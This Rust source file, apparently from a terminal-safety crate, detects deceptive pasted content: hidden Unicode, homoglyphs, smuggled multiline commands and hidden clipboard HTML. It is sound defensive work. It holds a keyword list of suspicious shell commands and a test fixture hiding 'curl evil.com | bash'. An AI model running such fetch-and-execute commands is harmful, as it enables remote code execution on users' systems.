tirith-core 0.3.0

use crate::extract;
use crate::verdict::{Evidence, Finding, RuleId, Severity};

/// Check raw bytes for terminal deception (paste-time).
pub fn check_bytes(input: &[u8]) -> Vec<Finding> {
    check_bytes_with_ignore(input, &[])
}

/// Like [`check_bytes`] but skips bytes whose offset falls inside any of the
/// supplied ignore ranges when deciding whether to emit a finding and when
/// assembling its evidence.
///
/// Used to carve out the inert argument span of tirith's own inspection
/// subcommands (`diff`/`score`/`why`/`receipt`/`explain`). Unicode-style
/// findings emitted with `Evidence::Text` (e.g. `UnicodeTags`) assemble their
/// detail string from the raw bytes, so the ignore has to be threaded into the
/// scan itself — filtering by offset after the fact cannot remove content that
/// was already decoded into the evidence string.
pub fn check_bytes_with_ignore(
    input: &[u8],
    ignore_ranges: &[std::ops::Range<usize>],
) -> Vec<Finding> {
    let mut findings = Vec::new();
    let mut scan = extract::scan_bytes(input);
    for range in ignore_ranges {
        scan = scan.with_ignored_range(range);
    }

    if scan.has_ansi_escapes {
        findings.push(Finding {
            rule_id: RuleId::AnsiEscapes,
            severity: Severity::High,
            title: "ANSI escape sequences in pasted content".to_string(),
            description: "Pasted content contains ANSI escape sequences that could hide malicious commands or manipulate terminal display".to_string(),
            evidence: scan.details.iter()
                .filter(|d| d.description.contains("escape"))
                .map(|d| Evidence::ByteSequence {
                    offset: d.offset,
                    hex: d.codepoint.map_or_else(|| format!("0x{:02x}", d.byte), |cp| format!("U+{cp:04X}")),
                    description: d.description.clone(),
                })
                .collect(),
            human_view: None,
            agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
        });
    }

    if scan.has_control_chars {
        findings.push(Finding {
            rule_id: RuleId::ControlChars,
            severity: Severity::High,
            title: "Control characters in pasted content".to_string(),
            description: "Pasted content contains control characters (display-overwriting carriage return, backspace, etc.) that could hide the true command being executed".to_string(),
            evidence: scan.details.iter()
                .filter(|d| d.description.contains("control"))
                .map(|d| Evidence::ByteSequence {
                    offset: d.offset,
                    hex: d.codepoint.map_or_else(|| format!("0x{:02x}", d.byte), |cp| format!("U+{cp:04X}")),
                    description: d.description.clone(),
                })
                .collect(),
            human_view: None,
            agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
        });
    }

    if scan.has_bidi_controls {
        findings.push(Finding {
            rule_id: RuleId::BidiControls,
            severity: Severity::Critical,
            title: "Bidirectional control characters detected".to_string(),
            description: "Content contains Unicode bidi override characters that can make text appear to read in a different order than it actually executes".to_string(),
            evidence: scan.details.iter()
                .filter(|d| d.description.contains("bidi"))
                .map(|d| Evidence::ByteSequence {
                    offset: d.offset,
                    hex: d.codepoint.map_or_else(|| format!("0x{:02x}", d.byte), |cp| format!("U+{cp:04X}")),
                    description: d.description.clone(),
                })
                .collect(),
            human_view: None,
            agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
        });
    }

    if scan.has_zero_width {
        // Suppress ZWJ (U+200D) / ZWNJ (U+200C) when surrounded by joining-script
        // characters (Arabic, Devanagari, Thai, etc.) — there they are legitimate.
        let zw_evidence: Vec<_> = scan
            .details
            .iter()
            .filter(|d| d.description.contains("zero-width"))
            .filter(|d| {
                let is_zwj_or_zwnj =
                    d.description.contains("U+200D") || d.description.contains("U+200C");
                if is_zwj_or_zwnj && is_joining_script_context(input, d.offset) {
                    return false;
                }
                true
            })
            .collect();

        if !zw_evidence.is_empty() {
            // Zero-width chars in otherwise pure ASCII have no legitimate use — elevate.
            let ascii_only = std::str::from_utf8(input)
                .map(|s| {
                    s.chars()
                        .filter(|ch| {
                            ch.is_alphanumeric() || ch.is_ascii_punctuation() || *ch == ' '
                        })
                        .all(|ch| ch.is_ascii())
                })
                .unwrap_or(false);
            let severity = if ascii_only {
                Severity::Critical
            } else {
                Severity::High
            };

            findings.push(Finding {
                rule_id: RuleId::ZeroWidthChars,
                severity,
                title: "Zero-width characters detected".to_string(),
                description: "Content contains invisible zero-width characters that could be used to obfuscate URLs or commands".to_string(),
                evidence: zw_evidence
                    .into_iter()
                    .map(|d| Evidence::ByteSequence {
                        offset: d.offset,
                        hex: d.codepoint.map_or_else(|| format!("0x{:02x}", d.byte), |cp| format!("U+{cp:04X}")),
                        description: d.description.clone(),
                    })
                    .collect(),
                human_view: None,
                agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
            });
        }
    }

    if scan.has_invisible_math_operators {
        findings.push(Finding {
            rule_id: RuleId::InvisibleMathOperator,
            severity: Severity::Medium,
            title: "Invisible math operator characters detected".to_string(),
            description: "Content contains invisible Unicode math operators (U+2061–U+2064) that could be used to obfuscate content".to_string(),
            evidence: scan.details.iter()
                .filter(|d| d.description.contains("invisible math operator"))
                .map(|d| Evidence::ByteSequence {
                    offset: d.offset,
                    hex: d.codepoint.map_or_else(|| format!("0x{:02x}", d.byte), |cp| format!("U+{cp:04X}")),
                    description: d.description.clone(),
                })
                .collect(),
            human_view: None,
            agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
        });
    }

    if scan.has_unicode_tags {
        // Decode excluding ignore-range bytes so hidden-text evidence can't leak
        // content from an inert arg span. If every tag byte was in an ignore range,
        // the decoder returns empty even though `scan.has_unicode_tags` was true —
        // skip emission in that case (nothing left to report on).
        let decoded = decode_unicode_tags(input, ignore_ranges);
        if !decoded.is_empty() || has_unicode_tag_outside_ranges(input, ignore_ranges) {
            findings.push(Finding {
                rule_id: RuleId::UnicodeTags,
                severity: Severity::Critical,
                title: "Unicode Tags (hidden ASCII) detected".to_string(),
                description: "Content contains Unicode Tag characters (U+E0000–U+E007F) that encode hidden ASCII text invisible to the user".to_string(),
                evidence: vec![Evidence::Text {
                    detail: if decoded.is_empty() {
                        "Hidden text could not be decoded".to_string()
                    } else {
                        format!("Hidden text: \"{}\"", truncate(&decoded, 200))
                    },
                }],
                human_view: None,
                agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
            });
        }
    }

    if scan.has_variation_selectors {
        findings.push(Finding {
            rule_id: RuleId::VariationSelector,
            severity: Severity::Medium,
            title: "Variation selector characters detected".to_string(),
            description: "Content contains Unicode variation selectors (VS1-256). These are commonly used in emoji sequences but may indicate steganographic encoding or obfuscation".to_string(),
            evidence: scan.details.iter()
                .filter(|d| d.description.contains("variation selector"))
                .map(|d| Evidence::ByteSequence {
                    offset: d.offset,
                    hex: d.codepoint.map_or_else(|| format!("0x{:02x}", d.byte), |cp| format!("U+{cp:04X}")),
                    description: d.description.clone(),
                })
                .collect(),
            human_view: None,
            agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
        });
    }

    if scan.has_invisible_whitespace {
        findings.push(Finding {
            rule_id: RuleId::InvisibleWhitespace,
            severity: Severity::Medium,
            title: "Invisible whitespace characters detected".to_string(),
            description: "Content contains unusual Unicode whitespace variants (en space, em space, figure space, etc.) that could be used for steganographic encoding or command obfuscation".to_string(),
            evidence: scan.details.iter()
                .filter(|d| d.description.contains("invisible whitespace"))
                .map(|d| Evidence::ByteSequence {
                    offset: d.offset,
                    hex: d.codepoint.map_or_else(|| format!("0x{:02x}", d.byte), |cp| format!("U+{cp:04X}")),
                    description: d.description.clone(),
                })
                .collect(),
            human_view: None,
            agent_view: None,
            mitre_id: None,
            custom_rule_id: None,
        });
    }

    if scan.has_confusable_text {
        // Two-tier suppression to avoid firing on natural multilingual text:
        //   - Math alphanumerics ("text confusable U+"): no legitimate terminal use,
        //     so a ±16-byte ASCII proximity check is enough.
        //   - Standard Cyrillic/Greek confusables ("confusable U+"): only flag when
        //     mixed INTO the same word as ASCII.
        //     "gіthub" (attack) vs "Note: Привет" (benign multilingual).
        let confusable_details: Vec<_> = scan
            .details
            .iter()
            .filter(|d| {
                d.description.contains("confusable U+")
                    || d.description.contains("text confusable U+")
            })
            .collect();

        let has_suspicious = confusable_details.iter().any(|d| {
            if d.description.contains("text confusable U+") {
                is_ascii_nearby(input, d.offset)
            } else {
                is_same_word_as_ascii(input, d.offset)
            }
        });

        if has_suspicious {
            findings.push(Finding {
                rule_id: RuleId::ConfusableText,
                severity: Severity::High,
                title: "Confusable Unicode characters in text".to_string(),
                description: "Content contains Unicode characters visually identical to ASCII (math alphanumerics, Cyrillic/Greek lookalikes) appearing near ASCII text, which may indicate a homoglyph attack".to_string(),
                evidence: confusable_details
                    .iter()
                    .take(10)
                    .map(|d| Evidence::ByteSequence {
                        offset: d.offset,
                        hex: d.codepoint.map_or_else(
                            || format!("0x{:02x}", d.byte),
                            |cp| format!("U+{cp:04X}"),
                        ),
                        description: d.description.clone(),
                    })
                    .collect(),
                human_view: None,
                agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
            });
        }
    }

    if scan.has_hangul_fillers {
        findings.push(Finding {
            rule_id: RuleId::HangulFiller,
            severity: Severity::Medium,
            title: "Hangul Filler characters detected".to_string(),
            description: "Content contains invisible Hangul Filler characters (U+3164, U+115F, U+1160) that could be used to hide content or obfuscate commands".to_string(),
            evidence: scan.details.iter()
                .filter(|d| d.description.contains("hangul filler"))
                .map(|d| Evidence::ByteSequence {
                    offset: d.offset,
                    hex: d.codepoint.map_or_else(|| format!("0x{:02x}", d.byte), |cp| format!("U+{cp:04X}")),
                    description: d.description.clone(),
                })
                .collect(),
            human_view: None,
            agent_view: None,
            mitre_id: None,
            custom_rule_id: None,
        });
    }

    findings
}

/// Decode Unicode Tag characters (U+E0000–U+E007F) to their hidden ASCII message.
/// Each tag character encodes one ASCII byte: codepoint - 0xE0000 = ASCII value.
///
/// Byte offsets in `ignore_ranges` are skipped, so content inside an inert argument
/// span does not leak back out through the decoded evidence string.
fn decode_unicode_tags(input: &[u8], ignore_ranges: &[std::ops::Range<usize>]) -> String {
    let Ok(s) = std::str::from_utf8(input) else {
        eprintln!("tirith: warning: unicode tag decode failed: input is not valid UTF-8");
        return String::new();
    };
    let mut decoded = String::new();
    for (byte_off, ch) in s.char_indices() {
        if ignore_ranges.iter().any(|r| r.contains(&byte_off)) {
            continue;
        }
        let cp = ch as u32;
        if (0xE0001..=0xE007F).contains(&cp) {
            let ascii = (cp - 0xE0000) as u8;
            if ascii.is_ascii_graphic() || ascii == b' ' {
                decoded.push(ascii as char);
            }
        }
    }
    decoded
}

/// Returns true iff `input` contains at least one Unicode Tag byte at an
/// offset that falls OUTSIDE every ignore range.
fn has_unicode_tag_outside_ranges(input: &[u8], ignore_ranges: &[std::ops::Range<usize>]) -> bool {
    let Ok(s) = std::str::from_utf8(input) else {
        return false;
    };
    for (byte_off, ch) in s.char_indices() {
        if ignore_ranges.iter().any(|r| r.contains(&byte_off)) {
            continue;
        }
        let cp = ch as u32;
        if (0xE0001..=0xE007F).contains(&cp) {
            return true;
        }
    }
    false
}

/// Check for hidden multiline content in string input.
pub fn check_hidden_multiline(input: &str) -> Vec<Finding> {
    let mut findings = Vec::new();

    let lines: Vec<&str> = input.lines().collect();
    if lines.len() > 1 {
        // Skip line 0: the visible first line is what the user means to run.
        // Suspicious command shapes on subsequent lines are the paste-smuggling shape.
        for (i, line) in lines.iter().enumerate().skip(1) {
            let trimmed = line.trim();
            if trimmed.is_empty() {
                continue;
            }
            if looks_like_hidden_command(trimmed) {
                findings.push(Finding {
                    rule_id: RuleId::HiddenMultiline,
                    severity: Severity::High,
                    title: "Hidden multiline content detected".to_string(),
                    description: format!(
                        "Pasted content has a hidden command on line {}: '{}'",
                        i + 1,
                        truncate(trimmed, 60)
                    ),
                    evidence: vec![Evidence::Text {
                        detail: format!("line {}: {}", i + 1, truncate(trimmed, 100)),
                    }],
                    human_view: None,
                    agent_view: None,
                    mitre_id: None,
                    custom_rule_id: None,
                });
                break;
            }
        }
    }

    findings
}

/// Check if a byte offset in the input is surrounded by joining-script characters.
/// ZWJ and ZWNJ are legitimate in scripts that use character joining (Arabic, Devanagari, etc.).
/// Returns true only if BOTH immediate non-Common neighbors are in the same joining script.
/// One-sided joining (e.g., Latin + ZWJ + Arabic) is suspicious and not suppressed.
fn is_joining_script_context(input: &[u8], byte_offset: usize) -> bool {
    use unicode_script::{Script, UnicodeScript};

    let Ok(text) = std::str::from_utf8(input) else {
        return false;
    };

    let zw_char = text[byte_offset..].chars().next();
    let zw_len = zw_char.map(|c| c.len_utf8()).unwrap_or(1);

    // Script::Common/Inherited don't identify a writing system — skip them.
    let significant_script = |ch: char| {
        let s = ch.script();
        if s == Script::Common || s == Script::Inherited {
            None
        } else {
            Some(s)
        }
    };

    let before_script = if byte_offset > 0 {
        let mut prev_start = byte_offset - 1;
        while prev_start > 0 && !text.is_char_boundary(prev_start) {
            prev_start -= 1;
        }
        text[prev_start..]
            .chars()
            .next()
            .and_then(significant_script)
    } else {
        None
    };

    let after_offset = byte_offset + zw_len;
    let after_script = if after_offset < text.len() {
        text[after_offset..]
            .chars()
            .next()
            .and_then(significant_script)
    } else {
        None
    };

    // Require the SAME joining script on both sides. One-sided (Latin + ZWJ + Arabic)
    // or mismatched (Arabic + ZWJ + Devanagari) is the attack shape we want to flag.
    match (before_script, after_script) {
        (Some(before), Some(after)) => before == after && is_joining_script(before),
        _ => false,
    }
}

/// Scripts that legitimately use ZWJ/ZWNJ for character joining/shaping.
fn is_joining_script(script: unicode_script::Script) -> bool {
    use unicode_script::Script;
    matches!(
        script,
        Script::Arabic
            | Script::Syriac
            | Script::Mandaic
            | Script::Mongolian
            | Script::Devanagari
            | Script::Bengali
            | Script::Gurmukhi
            | Script::Gujarati
            | Script::Oriya
            | Script::Tamil
            | Script::Telugu
            | Script::Kannada
            | Script::Malayalam
            | Script::Sinhala
            | Script::Thai
            | Script::Tibetan
            | Script::Myanmar
    )
}

/// Check clipboard HTML for hidden content not visible in the plain-text paste.
///
/// When a user pastes text, the terminal only sees the plain-text representation,
/// but the clipboard may carry HTML with hidden content (CSS hiding, color hiding,
/// hidden attributes) or extra text not visible in the plain-text version.
pub fn check_clipboard_html(html: &str, plain_text: &str) -> Vec<Finding> {
    let mut findings = Vec::new();

    let rendered_findings = crate::rules::rendered::check(html, None);

    // Hidden-content rules become ClipboardHidden — same evidence, different rule id
    // so downstream UI can distinguish "paste says more than user sees" from
    // "rendered page has hidden bits".
    for f in rendered_findings {
        match f.rule_id {
            RuleId::HiddenCssContent | RuleId::HiddenColorContent | RuleId::HiddenHtmlAttribute => {
                findings.push(Finding {
                    rule_id: RuleId::ClipboardHidden,
                    severity: Severity::High,
                    title: "Clipboard HTML contains hidden content".to_string(),
                    description: format!(
                        "Rich-text clipboard has content hidden from visual rendering: {}",
                        f.description
                    ),
                    evidence: f.evidence,
                    human_view: None,
                    agent_view: None,
                    mitre_id: None,
                    custom_rule_id: None,
                });
            }
            _ => {}
        }
    }

    let visible_text = strip_html_tags(html);
    let visible_len = visible_text.trim().chars().count();
    let plain_len = plain_text.trim().chars().count();

    if visible_len > plain_len + 50 {
        findings.push(Finding {
            rule_id: RuleId::ClipboardHidden,
            severity: Severity::High,
            title: "Clipboard HTML contains more text than visible paste".to_string(),
            description: format!(
                "HTML content has ~{visible_len} chars of text vs {plain_len} chars in plain text \
                 ({} chars hidden)",
                visible_len - plain_len
            ),
            evidence: vec![Evidence::Text {
                detail: format!(
                    "HTML visible text: {visible_len} chars, plain text: {plain_len} chars"
                ),
            }],
            human_view: None,
            agent_view: None,
            mitre_id: None,
            custom_rule_id: None,
        });
    }

    findings
}

/// Strip HTML tags to extract approximate visible text content.
fn strip_html_tags(html: &str) -> String {
    use once_cell::sync::Lazy;
    use regex::Regex;

    static SCRIPT_STYLE: Lazy<Regex> =
        Lazy::new(|| Regex::new(r"(?is)<(?:script|style)[^>]*>.*?</(?:script|style)>").unwrap());
    static TAGS: Lazy<Regex> = Lazy::new(|| Regex::new(r"<[^>]*>").unwrap());
    static ENTITIES: Lazy<Regex> = Lazy::new(|| Regex::new(r"&[a-zA-Z]+;|&#\d+;").unwrap());
    static WHITESPACE: Lazy<Regex> = Lazy::new(|| Regex::new(r"\s+").unwrap());

    let s = SCRIPT_STYLE.replace_all(html, " ");
    let s = TAGS.replace_all(&s, " ");
    let s = ENTITIES.replace_all(&s, " ");
    let s = WHITESPACE.replace_all(&s, " ");
    s.trim().to_string()
}

/// Broad proximity check: ASCII letters within ±16 bytes.
/// Used for math alphanumeric symbols which have no legitimate terminal use.
fn is_ascii_nearby(input: &[u8], offset: usize) -> bool {
    let start = offset.saturating_sub(16);
    let end = (offset + 16).min(input.len());
    input[start..end].iter().any(|b| b.is_ascii_alphabetic())
}

/// Same-word check: the confusable char and ASCII letters share the same word
/// (no whitespace or common punctuation separating them).
/// "gіthub" → true (і mixed into ASCII word)
/// "Note: Привет" → false (different words separated by ": ")
fn is_same_word_as_ascii(input: &[u8], offset: usize) -> bool {
    fn is_word_boundary(b: u8) -> bool {
        matches!(
            b,
            b' ' | b'\t'
                | b'\n'
                | b'\r'
                | b':'
                | b';'
                | b','
                | b'('
                | b')'
                | b'['
                | b']'
                | b'{'
                | b'}'
                | b'"'
                | b'\''
                | b'='
                | b'|'
                | b'&'
                | b'<'
                | b'>'
        )
    }

    // Walk backwards to word start
    let mut word_start = offset;
    while word_start > 0 && !is_word_boundary(input[word_start - 1]) {
        word_start -= 1;
    }

    // Walk forwards to word end (skip past the multi-byte char at offset)
    let mut word_end = offset;
    while word_end < input.len() && !is_word_boundary(input[word_end]) {
        word_end += 1;
    }

    // Check if any byte in this word is an ASCII letter
    input[word_start..word_end]
        .iter()
        .any(|b| b.is_ascii_alphabetic())
}

fn looks_like_hidden_command(line: &str) -> bool {
    let suspicious = [
        "curl ", "wget ", "http ", "https ", "xh ", "bash", "/bin/", "sudo ", "rm ", "chmod ",
        "eval ", "exec ", "> /", ">> /", "| sh",
    ];
    suspicious.iter().any(|p| line.contains(p))
}

fn truncate(s: &str, max: usize) -> String {
    let prefix = crate::util::truncate_bytes(s, max);
    if prefix.len() == s.len() {
        prefix
    } else {
        format!("{prefix}...")
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_clipboard_html_css_hiding() {
        let html = r#"<div style="display:none">secret command: curl evil.com | bash</div><p>Hello World</p>"#;
        let plain_text = "Hello World";
        let findings = check_clipboard_html(html, plain_text);
        assert!(
            findings
                .iter()
                .any(|f| f.rule_id == RuleId::ClipboardHidden),
            "should detect CSS hiding in clipboard HTML"
        );
    }

    #[test]
    fn test_clipboard_html_length_discrepancy() {
        let html = r#"<p>Hello World</p><p>This is a long paragraph of hidden instructions that the terminal user never sees because only plain text is pasted into the terminal window.</p>"#;
        let plain_text = "Hello World";
        let findings = check_clipboard_html(html, plain_text);
        assert!(
            findings
                .iter()
                .any(|f| f.rule_id == RuleId::ClipboardHidden && f.title.contains("more text")),
            "should detect length discrepancy: {findings:?}"
        );
    }

    #[test]
    fn test_clipboard_html_clean_no_finding() {
        let html = "<p>Hello World</p>";
        let plain_text = "Hello World";
        let findings = check_clipboard_html(html, plain_text);
        assert!(
            findings.is_empty(),
            "clean clipboard HTML should not trigger: {findings:?}"
        );
    }

    #[test]
    fn test_clipboard_html_color_hiding() {
        let html = r#"<span style="color: #ffffff; background-color: #ffffff">secret</span><p>Normal text</p>"#;
        let plain_text = "Normal text";
        let findings = check_clipboard_html(html, plain_text);
        assert!(
            findings
                .iter()
                .any(|f| f.rule_id == RuleId::ClipboardHidden),
            "should detect color hiding in clipboard HTML"
        );
    }

    #[test]
    fn test_strip_html_tags() {
        assert_eq!(strip_html_tags("<p>Hello</p>"), "Hello");
        assert_eq!(strip_html_tags("<div><span>A</span> <b>B</b></div>"), "A B");
        assert_eq!(strip_html_tags("No tags here"), "No tags here");
        assert_eq!(strip_html_tags("&amp; &lt;"), "");
    }
}